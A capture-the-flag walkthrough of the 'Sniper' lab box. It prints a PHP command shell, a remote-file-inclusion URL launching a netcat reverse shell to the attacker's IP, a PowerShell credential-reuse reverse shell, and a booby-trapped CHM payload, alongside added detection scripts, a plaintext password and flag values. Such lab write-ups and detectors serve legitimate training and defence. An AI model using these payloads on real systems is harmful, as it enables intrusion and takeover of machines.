Sniper is the most challenging box I have done so far. Finding a way onto the machine as an unprivileged user took a long time, although in hindsight it was quite easy. Along the way there were several restrictions that kept me looking for new approaches. Nevertheless, it worked, and you can read my writeup of Sniper here: a Medium box for 30 points.
[0x1] Reconnaissance & Enumeration
As usual, the box starts with an Nmap scan to get an idea of which services are exposed.
nmap -sC -sV -oA sniper 10.10.10.151
[sudo] password for user:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-17 20:00 GMT
Nmap scan report for 10.10.10.151
Host is up (0.045s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Sniper Co.
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h59m58s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-02-18T04:01:36
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.01 seconds
The scan shows that a Microsoft IIS server is listening on port 80. To have a look around, I start a directory brute force with dirb.
dirb http://10.10.10.151
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Feb 24 19:57:53 2020
URL_BASE: http://10.10.10.151/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.151/ ----
==> DIRECTORY: http://10.10.10.151/blog/
==> DIRECTORY: http://10.10.10.151/Blog/
==> DIRECTORY: http://10.10.10.151/css/
==> DIRECTORY: http://10.10.10.151/images/
==> DIRECTORY: http://10.10.10.151/Images/
+ http://10.10.10.151/index.php (CODE:200|SIZE:2635)
==> DIRECTORY: http://10.10.10.151/js/
==> DIRECTORY: http://10.10.10.151/user/
In the end I am not much wiser than after manually clicking around on the website. There are three sites on display: the general one, a blog, and a user login page that is under construction.
[0x2] Initial foothold
After some searching on the website, I come across an option to select a language on the blog page. The URL carries a parameter that names a file to load. This suggests a Remote / Local File Inclusion (RFI / LFI) attack.
Many of the PHP reverse shells do not work, or hardly work, on this box. I finally opted for the simplest variant, found online in the form below and saved as shellz.php. If I pass a dir command to the URL I get a neat directory listing: the Local File Inclusion (LFI) works.
shellz.php
<?php echo system($_GET["cmd"]); ?>
Before the Remote File Inclusion (RFI) attack, I open a Netcat listener on port 442.
nc -nvlp 442
listening on [any] 442 ...
The final URL works after a long search. Through an SMB connection to a share on my machine I include my PHP shell, and from the same share I run the 64-bit version of Netcat with my IP address and port 442 as the reverse shell target.
http://10.10.10.151/blog/?lang=\\10.10.14.233\sniper\shellz.php&cmd=\\10.10.14.233\sniper\nc64.exe 10.10.14.233 442 -e cmd
The listener picks up the reverse connection and I have a shell as the user iusr.
connect to [10.10.15.246] from (UNKNOWN) [10.10.10.151] 53423
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\inetpub\wwwroot\blog>whoami
whoami
nt authority\iusr
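From the defender's side, the request above is easy to spot in the web server logs: the lang parameter should only ever carry a short language code, never a UNC path, a URL or a traversal sequence. The following Python script is an added example, not part of the original writeup; it scans W3C-style IIS log lines (constructed here, with an assumed field order) and flags include-style parameters carrying such values.

```python
import re
from urllib.parse import parse_qs, unquote

# Query parameters this blog passes to include(); add others your app uses.
WATCHED_PARAMS = {"lang", "page", "file"}

# Label + pattern for values that must never reach an include() call.
BAD_PATTERNS = [
    ("unc-path", re.compile(r"^\\\\|^//")),                       # \\host\share or //host/share
    ("url-scheme", re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)),  # http://, php://, ...
    ("traversal", re.compile(r"\.\.[/\\]")),                      # ../ or ..\
    ("null-byte", re.compile(r"\x00|%00")),                       # path truncation tricks
]

# Constructed W3C-style IIS log lines (not from the box); assumed field order:
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2020-02-24 19:58:01 10.10.10.151 GET /blog/index.php lang=en 80 10.10.14.233 200
2020-02-24 19:58:20 10.10.10.151 GET /blog/index.php lang=\\\\10.10.14.233\\sniper\\shellz.php&cmd=dir 80 10.10.14.233 200
2020-02-24 19:58:40 10.10.10.151 GET /blog/index.php lang=..%2F..%2Fuser%2Fdb.php 80 10.10.14.233 200
""".splitlines()

def suspicious_value(value):
    """Return the label of the first matching pattern, or None if the value looks clean."""
    decoded = unquote(value)  # also catch a second layer of percent-encoding
    for label, pattern in BAD_PATTERNS:
        if pattern.search(decoded):
            return label
    return None

def scan_log(lines):
    """Return (uri_stem, param, decoded_value, label) for every suspicious request."""
    findings = []
    for line in lines:
        if not line or line.startswith("#"):
            continue  # skip blank lines and W3C header directives
        fields = line.split()
        if len(fields) < 6 or fields[5] == "-":
            continue  # no query string logged for this request
        stem, query = fields[4], fields[5]
        for param, values in parse_qs(query, keep_blank_values=True).items():
            if param.lower() not in WATCHED_PARAMS:
                continue
            for value in values:
                label = suspicious_value(value)
                if label:
                    findings.append((stem, param, unquote(value), label))
    return findings
```

Running scan_log(SAMPLE_LOG) reports the UNC inclusion and the traversal attempt and leaves the legitimate lang=en request alone.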
[0x3] Path to User flag
There is not much of interest in the blog directory. In /user I see a db.php file in which a password is stored for the user dbuser. Perhaps this password is also used by another user: 36mEAhz/B8xQ~2VM
</body>
</html>
<?php
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
{
echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
?>
?></body>
</html>
I just check which users have a profile on the box to get an idea of what remains to be achieved. In this case there is only Chris.
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 6A2B-2640
Directory of C:\Users
04/11/2019 06:04 AM <DIR> .
04/11/2019 06:04 AM <DIR> ..
04/09/2019 05:47 AM <DIR> Administrator
04/11/2019 06:04 AM <DIR> Chris
04/09/2019 05:47 AM <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 17,882,988,544 bytes free
So there is only one extra user on this box. From the reverse shell under the iusr account I try to jump to Chris's account. For this I first start a new Netcat listener on port 446.
sudo nc -lnvp 446
listening on [any] 446 ...
A quick search turns up a PowerShell method for starting a new reverse shell from PowerShell, and with some adjustments it works. On the SMB share, Netcat is still available from the RFI step, so I can reuse it immediately for a reverse shell over port 446.
$username = 'sniper\chris'
$password = '36mEAhz/B8xQ~2VM'
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList @($username,(ConvertTo-SecureString -String $password -AsPlainText -Force))
Invoke-Command -ComputerName Sniper -Credential $cred -ScriptBlock { \\10.10.14.233\sniper\nc64.exe 10.10.14.233 446 -e cmd }
Got it! Netcat picks up the incoming connection and whoami shows that the password found in db.php also works for Chris.
connect to [10.10.15.246] from (UNKNOWN) [10.10.10.151] 53473
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\Chris\Documents>whoami
whoami
sniper\chris
Since this is the only user on the machine, I immediately jump to the desktop to look for the user flag.
C:\Users\Chris\Desktop>type user.txt
type user.txt
21f4d0f29fc4dd867500c1ad716cf56e
[0x4] Path to Root flag
With the user flag in my pocket, it is time to search further. In Chris's Downloads folder there is a Windows Help file called instructions.chm. I view its contents with kchmviewer and find another tip. Apparently it has something to do with an exploit around CHM files.
In the Docs folder I find a second hint: "Drop it here when you're done with it." Chances are that CHM files in this folder will be picked up and executed automatically.
C:\Docs>type note.txt
Hi Chris,
Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.
Regards,
Sniper CEO.
I find an article on how to add code to a CHM file, both manually and through a script called Nishang Out-CHM. In essence it is no more than adding a bit of extra code and compiling the CHM file.
.SYNOPSIS
Nishang script useful for creating Compiled HTML Help file (.CHM) which could be used to run PowerShell commands and scripts.
I add some code to build a Netcat-based reverse shell on port 447 that hands me a command prompt.
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",cmd.exe,/c c:\docs\nc64.exe -nv 10.10.14.233 447 -e c:\Windows\system32\cmd.exe">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
At the end of the script I call the function to compile everything, and a file called doc.chm is neatly created.
Out-CHM -Payload "" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
To catch the incoming connection I start another Netcat listener on port 447.
netcat -lnvp 447
listening on [any] 447 ...
The shell as Chris is still running and I use it to copy both 64-bit Netcat and the CHM file to the Docs folder, as indicated in the CEO's message.
copy \\10.10.14.233\sniper\upload\*.*
Volume in drive C has no label.
Volume Serial Number is 6A2B-2640
Directory of C:\Docs
02/24/2020 05:06 PM <DIR> .
02/24/2020 05:06 PM <DIR> ..
02/24/2020 08:49 AM 45,272 nc64.exe
04/11/2019 08:31 AM 285 note.txt
04/11/2019 08:17 AM 552,607 php for dummies-trial.pdf
02/24/2020 09:04 AM 13,380 Project.chm
4 File(s) 611,544 bytes
2 Dir(s) 17,935,466,496 bytes free
After copying the file (renamed to Project.chm) I see it disappear within seconds and the listener picks up the incoming connection.
connect to [10.10.14.233] from (UNKNOWN) [10.10.10.151] 56190
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
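For anyone who has to triage a CHM file dropped somewhere like C:\Docs, the object shown earlier is the thing to look for: the HTML Help ActiveX control (clsid adb880a6-d8ff-11cf-9377-00aa003b7a11) with Command=ShortCut launches whatever program Item1 names. This Python script is an added example, not from the writeup or from Nishang; it assumes the CHM has already been decompiled to HTML (hh.exe -decompile does this), and the HTML sample in it is constructed.

```python
from html.parser import HTMLParser

# CLSID of the HTML Help control (hhctrl.ocx); its "ShortCut" command runs the program in Item1.
HHCTRL_CLSID = "clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"

class ShortcutObjectParser(HTMLParser):
    """Collect every HHCtrl <OBJECT> that uses Command=ShortCut, with its Item1 target."""
    def __init__(self):
        super().__init__()
        self.findings = []
        self._current = None  # PARAMs of the HHCtrl <OBJECT> we are inside, if any

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            if a.get("classid", "").lower() == HHCTRL_CLSID:
                self._current = {}
        elif tag == "param" and self._current is not None:
            self._current[a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object" and self._current is not None:
            params, self._current = self._current, None
            if params.get("command", "").lower() == "shortcut":
                # Item1 format is "<window>,<program>,<arguments>"
                parts = params.get("item1", "").split(",", 2) + ["", "", ""]
                self.findings.append({"program": parts[1].strip(), "args": parts[2].strip()})

def find_shortcut_objects(html_source):
    """Return {"program", "args"} for every auto-launch capable object in the decompiled HTML."""
    parser = ShortcutObjectParser()
    parser.feed(html_source)
    parser.close()
    return parser.findings

# Constructed HTML as a decompiled CHM page might contain it; not taken from the box.
# The first object is a harmless "Related Topics" control, the second is a launcher.
SAMPLE_HTML = """<html><body>
<OBJECT id=rel classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="Related Topics">
</OBJECT>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",cmd.exe,/c echo constructed-sample">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
</body></html>"""
```

Any hit from find_shortcut_objects on a help file that arrived from outside is a reason to quarantine it rather than open it, whatever program it names.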
On the reverse shell I am indeed connected as Administrator and the root flag is where I expect it to be.
C:\Users\Administrator\Desktop>whoami
whoami
sniper\administrator
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 6A2B-2640
Directory of C:\Users\Administrator\Desktop
10/01/2019 07:44 AM <DIR> .
10/01/2019 07:44 AM <DIR> ..
04/11/2019 07:13 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 17,935,482,880 bytes free
The last flag of the box. It was not always easy, but I learned a lot. In practice it is unlikely that a CHM file on a server will be processed automatically, but on a workstation that scenario is quite plausible. In any case, it was an original way to get root.
C:\Users\Administrator\Desktop>type root.txt
type root.txt
5624caf363e2750e994f6be0b7436c15